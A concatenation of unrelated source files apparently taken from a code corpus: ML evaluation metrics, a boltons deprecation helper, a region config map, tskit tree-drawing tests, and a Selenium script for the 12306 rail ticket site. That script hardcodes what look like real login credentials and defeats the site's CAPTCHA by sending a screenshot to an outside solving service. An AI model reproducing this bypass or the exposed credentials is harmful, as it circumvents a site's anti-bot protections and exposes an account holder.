return skm.accuracy_score(y_true, y_pred)
@gin.configurable
def auc(y_true, y_pred, round=True):
"""Area under the ROC curve
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = y_true.round()
if len(y_true) == 0 or len(np.unique(y_true)) < 2:
return np.nan
return skm.roc_auc_score(y_true, y_pred)
@gin.configurable
def auprc(y_true, y_pred):
"""Area under the precision-recall curve
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
return skm.average_precision_score(y_true, y_pred)
@gin.configurable
def mcc(y_true, y_pred, round=True):
"""Matthews correlation coefficient
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = np.round(y_true)
y_pred = np.round(y_pred)
return skm.matthews_corrcoef(y_true, y_pred)
@gin.configurable
def f1(y_true, y_pred, round=True):
"""F1 score: `2 * (p * r) / (p + r)`, where p=precision and r=recall.
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = np.round(y_true)
y_pred = np.round(y_pred)
return skm.f1_score(y_true, y_pred)
@gin.configurable
def cat_acc(y_true, y_pred):
"""Categorical accuracy
"""
return np.mean(y_true.argmax(axis=1) == y_pred.argmax(axis=1))
classification_metrics = [
("auPR", auprc),
("auROC", auc),
("accuracy", accuracy),
("n_positive", n_positive),
("n_negative", n_negative),
("frac_positive", frac_positive),
]
@gin.configurable
class ClassificationMetrics:
"""All classification metrics
"""
cls_metrics = classification_metrics
def __init__(self):
self.classification_metric = MetricsOrderedDict(self.cls_metrics)
def __call__(self, y_true, y_pred):
return self.classification_metric(y_true, y_pred)
# TODO - add gin macro for a standard set of classification and regession metrics
# --------------------------------------------
# Regression
@gin.configurable
def cor(y_true, y_pred):
"""Compute Pearson correlation coefficient.
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
return np.corrcoef(y_true, y_pred)[0, 1]
@gin.configurable
def kendall(y_true, y_pred, nb_sample=100000):
"""Kendall's tau coefficient, Kendall rank correlation coefficient
"""
from scipy.stats import kendalltau
y_true, y_pred = _mask_nan(y_true, y_pred)
if len(y_true) > nb_sample:
idx = np.arange(len(y_true))
np.random.shuffle(idx)
idx = idx[:nb_sample]
y_true = y_true[idx]
y_pred = y_pred[idx]
return kendalltau(y_true, y_pred)[0]
@gin.configurable
def mad(y_true, y_pred):
"""Median absolute deviation
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
return np.mean(np.abs(y_true - y_pred))
@gin.configurable
def rmse(y_true, y_pred):
"""Root mean-squared error
"""
return np.sqrt(mse(y_true, y_pred))
@gin.configurable
def rrmse(y_true, y_pred):
"""1 - rmse
"""
return 1 - rmse(y_true, y_pred)
@gin.configurable
def mse(y_true, y_pred):
"""Mean squared error
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
return ((y_true - y_pred) ** 2).mean(axis=None)
@gin.configurable
def ermse(y_true, y_pred):
"""Exponentiated root-mean-squared error
"""
return 10**np.sqrt(mse(y_true, y_pred))
@gin.configurable
def var_explained(y_true, y_pred):
"""Fraction of variance explained.
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
var_resid = np.var(y_true - y_pred)
var_y_true = np.var(y_true)
return 1 - var_resid / var_y_true
@gin.configurable
def pearsonr(y_true, y_pred):
from scipy.stats import pearsonr
y_true, y_pred = _mask_nan(y_true, y_pred)
return pearsonr(y_true, y_pred)[0]
@gin.configurable
def spearmanr(y_true, y_pred):
from scipy.stats import spearmanr
y_true, y_pred = _mask_nan(y_true, y_pred)
return spearmanr(y_true, y_pred)[0]
@gin.configurable
def pearson_spearman(yt, yp):
return {"pearsonr": pearsonr(yt, yp),
"spearmanr": spearmanr(yt, yp)}
regression_metrics = [
("mse", mse),
("var_explained", var_explained),
("pearsonr", pearsonr), # pearson and spearman correlation
("spearmanr", spearmanr),
("mad", mad), # median absolute deviation
]
@gin.configurable
class RegressionMetrics:
"""All classification metrics
"""
cls_metrics = regression_metrics
def __init__(self):
self.regression_metric = MetricsOrderedDict(self.cls_metrics)
def __call__(self, y_true, y_pred):
# squeeze the last dimension
if y_true.ndim == 2 and y_true.shape[1] == 1:
y_true = np.ravel(y_true)
if y_pred.ndim == 2 and y_pred.shape[1] == 1:
y_pred = np.ravel(y_pred)
return self.regression_metric(y_true, y_pred)
# available eval metrics --------------------------------------------
BINARY_CLASS = ["auc", "auprc", "accuracy", "tpr", "tnr", "f1", "mcc"]
CATEGORY_CLASS = ["cat_acc"]
REGRESSION = ["mse", "mad", "cor", "ermse", "var_explained"]
AVAILABLE = BINARY_CLASS + CATEGORY_CLASS + REGRESSION
| 29.7713 | 96 | 0.609279 |
795473f6eecddf8eaa697c39175e4c412b8a0c6a | 2,711 | py | Python | src/utsc/core/_vendor/boltons/deprutils.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | src/utsc/core/_vendor/boltons/deprutils.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | src/utsc/core/_vendor/boltons/deprutils.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2013, Mahmoud Hashemi
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * The names of the contributors may not be used to endorse or
# promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Note that DeprecationWarnings are ignored by default in Python
2.7/3.2+, so be sure to either un-ignore them in your code, or run
Python with the -Wd flag.
"""
import sys
from warnings import warn
ModuleType = type(sys)
# todo: only warn once
class DeprecatableModule(ModuleType):
def __init__(self, module):
name = module.__name__
super(DeprecatableModule, self).__init__(name=name)
self.__dict__.update(module.__dict__)
def __getattribute__(self, name):
get_attribute = super(DeprecatableModule, self).__getattribute__
try:
depros = get_attribute("_deprecated_members")
except AttributeError:
self._deprecated_members = depros = {}
ret = get_attribute(name)
message = depros.get(name)
if message is not None:
warn(message, DeprecationWarning, stacklevel=2)
return ret
def deprecate_module_member(mod_name, name, message):
module = sys.modules[mod_name]
if not isinstance(module, DeprecatableModule):
sys.modules[mod_name] = module = DeprecatableModule(module)
module._deprecated_members[name] = message
return
| 37.136986 | 72 | 0.729989 |
795474c5186cff30ef63f8a6d5bf537a367490c3 | 492 | py | Python | pktfwd/config/region_config_filenames.py | KevinWassermann94/hm-pktfwd | 57f52a507759c57a4fe0a6baeb315cf3cb9e668f | [
"MIT"
] | null | null | null | pktfwd/config/region_config_filenames.py | KevinWassermann94/hm-pktfwd | 57f52a507759c57a4fe0a6baeb315cf3cb9e668f | [
"MIT"
] | null | null | null | pktfwd/config/region_config_filenames.py | KevinWassermann94/hm-pktfwd | 57f52a507759c57a4fe0a6baeb315cf3cb9e668f | [
"MIT"
] | null | null | null | REGION_CONFIG_FILENAMES = {
"AS923_1": "AS923-1-global_conf.json",
"AS923_2": "AS923-2-global_conf.json",
"AS923_3": "AS923-3-global_conf.json",
"AS923_4": "AS923-4-global_conf.json",
"AU915": "AU-global_conf.json",
"CN470": "CN-global_conf.json",
"EU433": "EU433-global_conf.json",
"EU868": "EU-global_conf.json",
"IN865": "IN-global_conf.json",
"KR920": "KR-global_conf.json",
"RU864": "RU-global_conf.json",
"US915": "US-global_conf.json"
}
| 32.8 | 42 | 0.638211 |
795476239b962d6c9d16cb8cc2048f7b2b08fcf8 | 1,990 | py | Python | SpiderExercise/day_04/12306.py | tjhlp/SmallSpider | 5518fbd14d66d3b0aca5ac8871839b7e1de49d47 | [
"MIT"
] | null | null | null | SpiderExercise/day_04/12306.py | tjhlp/SmallSpider | 5518fbd14d66d3b0aca5ac8871839b7e1de49d47 | [
"MIT"
] | null | null | null | SpiderExercise/day_04/12306.py | tjhlp/SmallSpider | 5518fbd14d66d3b0aca5ac8871839b7e1de49d47 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from selenium import webdriver
import time
from PIL import Image
from io import BytesIO
from selenium.webdriver import ActionChains
from day_04.YDMHTTP import decode
browser = webdriver.Chrome('./chromedriver.exe')
fs = "武汉,WHN"
ts = "深圳,SZQ"
date = "2019-09-03"
base_url = 'https://kyfw.12306.cn/otn/leftTicket/init?linktypeid=dc&fs={}&ts={}&date={}&flag=N,N,Y'
browser.get(base_url.format(fs, ts, date))
time.sleep(3)
li_elements = browser.find_elements_by_xpath('//tbody[@id="queryLeftTable"]//tr[starts-with(@id,"ticket_")]')
for li_element in li_elements:
name = li_element.find_element_by_class_name('number').text
cdz = li_element.find_element_by_class_name('cdz').text
try:
revers_obj = browser.find_element_by_class_name('btn72')
revers_obj.click()
except:
continue
time.sleep(2)
browser.find_element_by_class_name('login-hd-account').click()
time.sleep(2)
browser.find_element_by_id('J-userName').send_keys('r374586186')
browser.find_element_by_id('J-password').send_keys('t8306418')
img_element = browser.find_element_by_id('J-loginImg')
full_image = browser.get_screenshot_as_png()
img = Image.open(BytesIO(full_image))
scale = 0.7
# 354 207
x1 = img_element.location.get("x") * scale
y1 = img_element.location.get("y")
x2 = x1 + img_element.size.get('width')
y2 = y1 + img_element.size.get('height')
cut_info = (x1, y1, x2, y2)
cut_img = img.crop(cut_info)
cut_img.save('cut.png')
time.sleep(1)
result = decode('cut.png', 6701)
print(result)
positions = [
(40, 70),
(120, 70),
(180, 70),
(260, 70),
(40, 140),
(120, 140),
(180, 140),
(260, 140)
]
for num in result:
position = positions[int(num) - 1]
print(position)
ActionChains(browser).move_to_element_with_offset(img_element, position[0],
position[1]).click().perform()
browser.find_element_by_id('J-login').click()
time.sleep(3)
# browser.quit()
| 26.184211 | 109 | 0.685427 |
79547692c5be877b643e56e3ee1f618e709997d6 | 68,469 | py | Python | python/tests/test_drawing.py | hyanwong/tskit | f1c5e29e2f4ed022a436895cea3e92f21e368ec6 | [
"MIT"
] | null | null | null | python/tests/test_drawing.py | hyanwong/tskit | f1c5e29e2f4ed022a436895cea3e92f21e368ec6 | [
"MIT"
] | null | null | null | python/tests/test_drawing.py | hyanwong/tskit | f1c5e29e2f4ed022a436895cea3e92f21e368ec6 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2018-2019 Tskit Developers
# Copyright (C) 2017 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Test cases for visualisation in tskit.
"""
import collections
import io
import math
import os
import re
import tempfile
import xml.dom.minidom
import xml.etree
import msprime
import numpy as np
import pytest
import xmlunittest
import tests.tsutil as tsutil
import tskit
from tskit import drawing
class TestTreeDraw:
"""
Tests for the tree drawing functionality.
"""
def get_binary_tree(self):
ts = msprime.simulate(10, random_seed=1, mutation_rate=1)
return next(ts.trees())
def get_nonbinary_ts(self):
demographic_events = [
msprime.SimpleBottleneck(time=0.1, population=0, proportion=0.5)
]
return msprime.simulate(
10,
recombination_rate=5,
mutation_rate=10,
demographic_events=demographic_events,
random_seed=1,
)
def get_nonbinary_tree(self):
for t in self.get_nonbinary_ts().trees():
for u in t.nodes():
if len(t.children(u)) > 2:
return t
raise AssertionError()
def get_zero_edge_tree(self):
tables = tskit.TableCollection(sequence_length=2)
# These must be samples or we will have zero roots.
tables.nodes.add_row(flags=tskit.NODE_IS_SAMPLE, time=0)
tables.nodes.add_row(flags=tskit.NODE_IS_SAMPLE, time=0)
tables.sites.add_row(position=0, ancestral_state="0")
tables.mutations.add_row(site=0, node=0, derived_state="1")
tables.mutations.add_row(site=0, node=1, derived_state="1")
return tables.tree_sequence().first()
def get_zero_roots_tree(self):
tables = tskit.TableCollection(sequence_length=2)
# If we have no samples we have zero roots
tables.nodes.add_row(time=0)
tables.nodes.add_row(time=0)
tables.nodes.add_row(time=1)
tables.edges.add_row(0, 2, 2, 0)
tables.edges.add_row(0, 2, 2, 1)
tree = tables.tree_sequence().first()
assert tree.num_roots == 0
return tree
def get_multiroot_tree(self):
ts = msprime.simulate(15, random_seed=1)
# Take off the top quarter of edges
tables = ts.dump_tables()
edges = tables.edges
n = len(edges) - len(edges) // 4
edges.set_columns(
left=edges.left[:n],
right=edges.right[:n],
parent=edges.parent[:n],
child=edges.child[:n],
)
ts = tables.tree_sequence()
for t in ts.trees():
if t.num_roots > 1:
return t
raise AssertionError()
def get_mutations_over_roots_tree(self):
ts = msprime.simulate(15, random_seed=1)
ts = tsutil.decapitate(ts, 20)
tables = ts.dump_tables()
delta = 1.0 / (ts.num_nodes + 1)
x = 0
for node in range(ts.num_nodes):
site_id = tables.sites.add_row(x, ancestral_state="0")
x += delta
tables.mutations.add_row(site_id, node=node, derived_state="1")
ts = tables.tree_sequence()
tree = ts.first()
assert any(tree.parent(mut.node) == tskit.NULL for mut in tree.mutations())
return tree
def get_unary_node_tree(self):
ts = msprime.simulate(2, random_seed=1)
tables = ts.dump_tables()
edges = tables.edges
# Take out all the edges except 1
n = 1
edges.set_columns(
left=edges.left[:n],
right=edges.right[:n],
parent=edges.parent[:n],
child=edges.child[:n],
)
ts = tables.tree_sequence()
for t in ts.trees():
for u in t.nodes():
if len(t.children(u)) == 1:
return t
raise AssertionError()
def get_empty_tree(self):
tables = tskit.TableCollection(sequence_length=1)
ts = tables.tree_sequence()
return next(ts.trees())
def get_simple_ts(self):
"""
return a simple tree seq that does not depend on msprime
"""
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 0 0 -1 0.02445014598813
5 0 0 -1 0.11067965364865
6 0 0 -1 1.75005250750382
7 0 0 -1 2.31067154311640
8 0 0 -1 3.57331354884652
9 0 0 -1 9.08308317451295
"""
)
edges = io.StringIO(
"""\
id left right parent child
0 0.00000000 1.00000000 4 0
1 0.00000000 1.00000000 4 1
2 0.00000000 1.00000000 5 2
3 0.00000000 1.00000000 5 3
4 0.79258618 0.90634460 6 4
5 0.79258618 0.90634460 6 5
6 0.05975243 0.79258618 7 4
7 0.90634460 0.91029435 7 4
8 0.05975243 0.79258618 7 5
9 0.90634460 0.91029435 7 5
10 0.91029435 1.00000000 8 4
11 0.91029435 1.00000000 8 5
12 0.00000000 0.05975243 9 4
13 0.00000000 0.05975243 9 5
"""
)
sites = io.StringIO(
"""\
position ancestral_state
0.05 A
0.06 0
"""
)
mutations = io.StringIO(
"""\
site node derived_state parent
0 9 T -1
0 9 G 0
0 4 1 -1
"""
)
return tskit.load_text(
nodes, edges, sites=sites, mutations=mutations, strict=False
)
def closest_left_node(tree, u):
"""
Returns the node that is closest to u in a left-to-right sense.
"""
ret = tskit.NULL
while u != tskit.NULL and ret == tskit.NULL:
ret = tree.left_sib(u)
u = tree.parent(u)
return ret
def get_left_neighbour(tree, traversal_order):
"""
This is a less efficient version of the get_left_neighbour function in
drawing.py.
"""
# Note: roots are the children of -1 here.
children = collections.defaultdict(list)
for u in tree.nodes(order=traversal_order):
parent = tree.parent(u)
children[parent].append(u)
left_neighbour = np.full(tree.num_nodes, tskit.NULL, dtype=int)
for u in tree.nodes():
next_left = tskit.NULL
child = u
while child != tskit.NULL and next_left == tskit.NULL:
parent = tree.parent(child)
child_index = children[parent].index(child)
if child_index > 0:
next_left = children[parent][child_index - 1]
child = parent
left_neighbour[u] = next_left
return left_neighbour
class TestClosestLeftNode(TestTreeDraw):
"""
Tests the code for finding the closest left node in a tree.
"""
def verify(self, tree):
m1 = drawing.get_left_neighbour(tree, "postorder")
m2 = get_left_neighbour(tree, "postorder")
np.testing.assert_array_equal(m1, m2)
for u in tree.nodes():
assert m1[u] == closest_left_node(tree, u)
m1 = drawing.get_left_neighbour(tree, "minlex_postorder")
m2 = get_left_neighbour(tree, "minlex_postorder")
np.testing.assert_array_equal(m1, m2)
def test_2_binary(self):
ts = msprime.simulate(2, random_seed=2)
self.verify(ts.first())
def test_5_binary(self):
ts = msprime.simulate(5, random_seed=2)
self.verify(ts.first())
def test_10_binary(self):
ts = msprime.simulate(10, random_seed=2)
self.verify(ts.first())
def test_20_binary(self):
ts = msprime.simulate(20, random_seed=3)
self.verify(ts.first())
def test_nonbinary(self):
self.verify(self.get_nonbinary_tree())
def test_zero_edge(self):
self.verify(self.get_zero_edge_tree())
def test_zero_roots(self):
self.verify(self.get_zero_roots_tree())
def test_multiroot(self):
self.verify(self.get_multiroot_tree())
def test_left_child(self):
t = self.get_nonbinary_tree()
left_child = drawing.get_left_child(t, "postorder")
for u in t.nodes(order="postorder"):
if t.num_children(u) > 0:
assert left_child[u] == t.children(u)[0]
def test_null_node_left_child(self):
t = self.get_nonbinary_tree()
left_child = drawing.get_left_child(t, "minlex_postorder")
assert left_child[tskit.NULL] == tskit.NULL
def test_leaf_node_left_child(self):
t = self.get_nonbinary_tree()
left_child = drawing.get_left_child(t, "minlex_postorder")
for u in t.samples():
assert left_child[u] == tskit.NULL
class TestOrder(TestTreeDraw):
"""
Tests for using the different node orderings.
"""
def test_bad_order(self):
for bad_order in [("sdf"), "sdf", 1234, ""]:
with pytest.raises(ValueError):
drawing.check_order(bad_order)
def test_default_order(self):
traversal_order = drawing.check_order(None)
assert traversal_order == "minlex_postorder"
def test_order_mapping(self):
assert drawing.check_order("tree") == "postorder"
assert drawing.check_order("minlex") == "minlex_postorder"
def test_tree_svg_variants(self):
t = self.get_binary_tree()
output1 = t.draw(format="svg")
output2 = t.draw(format="svg", order="minlex")
output3 = t.draw(format="svg", order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
# draw_svg gets the same results
assert t.draw_svg() == output1
assert t.draw_svg(order="minlex") == output1
assert t.draw_svg(order="tree") == output3
def test_tree_text_variants(self):
t = self.get_binary_tree()
output1 = t.draw(format="unicode")
output2 = t.draw(format="unicode", order="minlex")
output3 = t.draw(format="unicode", order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
# draw_text gets the same results
assert t.draw_text() == output1
assert t.draw_text(order="minlex") == output1
assert t.draw_text(order="tree") == output3
def test_tree_sequence_text_variants(self):
ts = msprime.simulate(10, random_seed=2)
output1 = ts.draw_text()
output2 = ts.draw_text(order="minlex")
output3 = ts.draw_text(order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
def test_tree_sequence_svg_variants(self):
ts = msprime.simulate(10, random_seed=2)
output1 = ts.draw_svg()
output2 = ts.draw_svg(order="minlex")
output3 = ts.draw_svg(order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
class TestFormats(TestTreeDraw):
"""
Tests that formats are recognised correctly.
"""
def test_svg_variants(self):
t = self.get_binary_tree()
for svg in ["svg", "SVG", "sVg"]:
output = t.draw(format=svg)
root = xml.etree.ElementTree.fromstring(output)
assert root.tag == "{http://www.w3.org/2000/svg}svg"
def test_default(self):
# Default is SVG
t = self.get_binary_tree()
output = t.draw(format=None)
root = xml.etree.ElementTree.fromstring(output)
assert root.tag == "{http://www.w3.org/2000/svg}svg"
output = t.draw()
root = xml.etree.ElementTree.fromstring(output)
assert root.tag == "{http://www.w3.org/2000/svg}svg"
def test_ascii_variants(self):
t = self.get_binary_tree()
for fmt in ["ascii", "ASCII", "AScii"]:
output = t.draw(format=fmt)
with pytest.raises(xml.etree.ElementTree.ParseError):
xml.etree.ElementTree.fromstring(
output,
)
def test_unicode_variants(self):
t = self.get_binary_tree()
for fmt in ["unicode", "UNICODE", "uniCODE"]:
output = t.draw(format=fmt)
with pytest.raises(xml.etree.ElementTree.ParseError):
xml.etree.ElementTree.fromstring(
output,
)
def test_bad_formats(self):
t = self.get_binary_tree()
for bad_format in ["", "ASC", "SV", "jpeg"]:
with pytest.raises(ValueError):
t.draw(format=bad_format)
class TestDrawText(TestTreeDraw):
"""
Tests the ASCII tree drawing method.
"""
drawing_format = "ascii"
example_label = "XXX"
def verify_basic_text(self, text):
assert isinstance(text, str)
# TODO surely something else we can verify about this...
def test_draw_defaults(self):
t = self.get_binary_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_nonbinary(self):
t = self.get_nonbinary_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_multiroot(self):
t = self.get_multiroot_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_mutations_over_roots(self):
t = self.get_mutations_over_roots_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_unary(self):
t = self.get_unary_node_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_empty_tree(self):
t = self.get_empty_tree()
with pytest.raises(ValueError):
t.draw(format=self.drawing_format)
def test_draw_zero_roots_tree(self):
t = self.get_zero_roots_tree()
with pytest.raises(ValueError):
t.draw(format=self.drawing_format)
def test_draw_zero_edge_tree(self):
t = self.get_zero_edge_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_even_num_children_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 1
2 1 2
3 1 1
4 1 4
5 1 5
6 1 7
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 6 0
0 1 6 1
0 1 6 2
0 1 6 3
0 1 6 4
0 1 6 5
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_odd_num_children_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 1
2 1 2
3 1 1
4 1 4
5 1 5
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 5 0
0 1 5 1
0 1 5 2
0 1 5 3
0 1 5 4
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_node_labels(self):
t = self.get_binary_tree()
labels = {u: self.example_label for u in t.nodes()}
text = t.draw(format=self.drawing_format, node_labels=labels)
self.verify_basic_text(text)
j = 0
for _ in t.nodes():
j = text[j:].find(self.example_label)
assert j != -1
def test_long_internal_labels(self):
t = self.get_binary_tree()
labels = {u: "X" * 10 for u in t.nodes() if t.is_internal(u)}
text = t.draw(format=self.drawing_format, node_labels=labels)
self.verify_basic_text(text)
def test_no_node_labels(self):
t = self.get_binary_tree()
labels = {}
text = t.draw(format=self.drawing_format, node_labels=labels)
self.verify_basic_text(text)
for u in t.nodes():
assert text.find(str(u)) == -1
def test_unused_args(self):
t = self.get_binary_tree()
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, width=300)
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, height=300)
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, mutation_labels={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, mutation_colours={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, edge_colours={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, node_colours={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, max_tree_height=1234)
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, tree_height_scale="time")
class TestDrawUnicode(TestDrawText):
"""
Tests the Unicode tree drawing method
"""
drawing_format = "unicode"
example_label = "\u20ac" * 10 # euro symbol
class TestDrawTextErrors:
"""
Tests for errors occuring in tree drawing code.
"""
def test_bad_orientation(self):
t = msprime.simulate(5, mutation_rate=0.1, random_seed=2).first()
for bad_orientation in ["", "leftright", "sdf"]:
with pytest.raises(ValueError):
t.draw_text(orientation=bad_orientation)
class TestDrawTextExamples(TestTreeDraw):
"""
Verify that we get the correct rendering for some examples.
"""
def verify_text_rendering(self, drawn, drawn_tree, debug=False):
if debug:
print("Drawn:")
print(drawn)
print("Expected:")
print(drawn_tree)
tree_lines = drawn_tree.splitlines()
drawn_lines = drawn.splitlines()
assert len(tree_lines) == len(drawn_lines)
for l1, l2 in zip(tree_lines, drawn_lines):
# Trailing white space isn't significant.
assert l1.rstrip() == l2.rstrip()
def test_simple_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 2 0
0 1 2 1
"""
)
tree = (
# fmt: off
" 2 \n"
"┏┻┓\n"
"0 1"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
drawn = t.draw_text()
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" 2 \n"
"+++\n"
"0 1\n"
# fmt: on
)
drawn = t.draw_text(use_ascii=True, order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" ┏0\n"
"2┫ \n"
" ┗1\n"
# fmt: on
)
drawn = t.draw_text(orientation="left", order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" +0\n"
"2+ \n"
" +1\n"
# fmt: on
)
drawn = t.draw_text(orientation="left", use_ascii=True, order="tree")
self.verify_text_rendering(drawn, tree)
def test_simple_tree_long_label(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 2 0
0 1 2 1
"""
)
tree = (
# fmt: off
"ABCDEF\n"
"┏┻┓ \n"
"0 1 \n"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw_text(node_labels={0: "0", 1: "1", 2: "ABCDEF"}, order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
"0┓ \n"
" ┣ABCDEF\n"
"1┛ \n"
# fmt: on
)
drawn = t.draw_text(
node_labels={0: "0", 1: "1", 2: "ABCDEF"}, orientation="right", order="tree"
)
self.verify_text_rendering(drawn, tree)
drawn = t.draw_text(
node_labels={0: "ABCDEF", 1: "1", 2: "2"}, orientation="right", order="tree"
)
tree = (
# fmt: off
"ABCDEF┓ \n"
" ┣2\n"
"1━━━━━┛ \n"
# fmt: on
)
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" ┏0\n"
"ABCDEF┫ \n"
" ┗1\n"
# fmt: on
)
drawn = t.draw_text(
node_labels={0: "0", 1: "1", 2: "ABCDEF"}, orientation="left", order="tree"
)
self.verify_text_rendering(drawn, tree)
def test_four_leaves(self):
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 0 0 -1 0.26676079696421
5 0 0 -1 1.48826948286480
6 0 0 -1 2.91835007758007
"""
)
edges = io.StringIO(
"""\
left right parent child
0.00000000 1.00000000 4 0
0.00000000 1.00000000 4 3
0.00000000 1.00000000 5 2
0.00000000 1.00000000 5 4
0.00000000 1.00000000 6 1
0.00000000 1.00000000 6 5
"""
)
tree = (
" 6 \n"
"┏━┻━┓ \n"
"┃ 5 \n"
"┃ ┏━┻┓ \n"
"┃ ┃ 4 \n"
"┃ ┃ ┏┻┓ \n"
"1 2 0 3 \n"
)
ts = tskit.load_text(nodes, edges, strict=False)
t = ts.first()
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(order="tree"), tree)
drawn = t.draw_text(orientation="bottom", order="tree")
tree = (
"1 2 0 3\n"
"┃ ┃ ┗┳┛\n"
"┃ ┃ 4 \n"
"┃ ┗━┳┛ \n"
"┃ 5 \n"
"┗━┳━┛ \n"
" 6 \n"
)
self.verify_text_rendering(drawn, tree)
tree = (
" ┏━━━━1\n"
" ┃ \n"
